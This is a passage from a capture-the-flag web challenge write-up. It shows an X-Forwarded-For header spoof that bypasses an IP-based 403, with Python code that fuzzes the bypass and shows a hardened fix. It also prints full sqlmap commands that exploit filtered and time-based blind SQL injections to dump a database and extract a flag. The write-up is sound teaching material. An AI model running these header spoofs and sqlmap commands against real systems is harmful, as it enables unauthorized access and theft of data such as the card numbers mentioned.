login.php, but it gives us a 403 Forbidden error. Looking a little deeper into gallery.php shows that some of the pictures of the devices include internal subnet addresses.
The X-Forwarded-For header is used to identify the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer. If the server trusts that header to decide whether a client is "internal", the client can simply set it itself. Fuzzing with X-Forwarded-For: 192.168.3.x, where x is the payload, we see that by setting the header to X-Forwarded-For: 192.168.3.16 we gain access to the login page.
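The bypass above, as an added example that is not part of the original writeup: a stand-in for a server that trusts X-Forwarded-For to decide who is internal, the fuzz loop that walks the 192.168.3.0/24 subnet seen in gallery.php until a value is accepted, and a hardened client-address function that only honours the header when the TCP peer is a proxy we operate. The allowlist containing 192.168.3.16, the trusted-proxy address 10.0.0.2 and the external client address 203.0.113.7 are assumptions made for the example; the challenge's real access rule is not known.

```python
import ipaddress

# Assumed access rule for login.php: only these addresses may see the page.
# The writeup found 192.168.3.16 by fuzzing; the real rule is not published.
INTERNAL_ALLOWLIST = {"192.168.3.16"}


def client_ip_vulnerable(headers, remote_addr):
    """Vulnerable: trusts X-Forwarded-For unconditionally and takes the first hop,
    which is whatever the client put there."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def login_allowed_vulnerable(headers, remote_addr):
    """Stand-in for the 403 check on login.php."""
    return client_ip_vulnerable(headers, remote_addr) in INTERNAL_ALLOWLIST


def fuzz_xff(check, remote_addr="203.0.113.7", subnet="192.168.3.0/24"):
    """Send X-Forwarded-For: 192.168.3.x for every host in the subnet and return
    the first value the access check accepts (None if nothing works)."""
    for host in ipaddress.ip_network(subnet).hosts():
        headers = {"X-Forwarded-For": str(host)}
        if check(headers, remote_addr):
            return str(host)
    return None


def client_ip_hardened(headers, remote_addr, trusted_proxies):
    """Hardened: walk the hop list from the right, skipping proxies we operate,
    and return the first address not under our control. A prefix the client
    wrote into X-Forwarded-For is therefore never used, and a direct connection
    from an untrusted peer resolves to the TCP peer address."""
    xff = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()] + [remote_addr]
    for hop in reversed(hops):
        if hop not in trusted_proxies:
            return hop
    return remote_addr


def login_allowed_hardened(headers, remote_addr, trusted_proxies=frozenset({"10.0.0.2"})):
    return client_ip_hardened(headers, remote_addr, trusted_proxies) in INTERNAL_ALLOWLIST


if __name__ == "__main__":
    print("vulnerable server accepts:", fuzz_xff(login_allowed_vulnerable))
    print("hardened server accepts:", fuzz_xff(login_allowed_hardened))
```

Against the vulnerable check the fuzz loop stops at 192.168.3.16; against the hardened check it runs the whole subnet and returns None, because the spoofed header is ignored unless the connection arrives via 10.0.0.2, and even then only the address that proxy appended counts.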
A single quote (') in the username parameter leads to the following output:
users.php page. This page contains usernames and card numbers.
/users.php?id=1 returns only the data for user ID 1. Fuzzing the id parameter shows that this is a second SQL injection endpoint, but this time there is a blacklist filter:
sqlmap -r get.req --threads 10 --dbms mysql --dump --no-escape --tamper=between dumps the database. The between tamper rewrites = and > comparisons as BETWEEN clauses so that the injected conditions get past the filter.
R34L_F14G column, but it returns <blank> results. Looking deeper into the SQLMap queries, I found that the following query is used to retrieve the column values.
R34L_F14G fails the blacklist filter, so SQLMap is unable to retrieve any results: the tamper only rewrites comparison operators, not identifiers, so the column name itself still hits the filter.
Remember login.php from earlier? It did not filter R34L_F14G, and it has an SQL injection vector too. It is a blind SQL injection, so retrieval is time-based; dumping the entire database that way would have been far too slow, but here we only need one column of one row.
sqlmap -u http://challenges.ctfd.io:30232/login.php --headers="X-Forwarded-For: 192.168.3.16" --data "password=1&username=test" --dbms=mysql --tamper=between -D users_data -T data -C R34L_F14G --dump --where "id=3"
The --headers option carries the X-Forwarded-For value that gets us past the 403, and -D users_data -T data -C R34L_F14G --where "id=3" restricts the time-based extraction to the single cell we are after.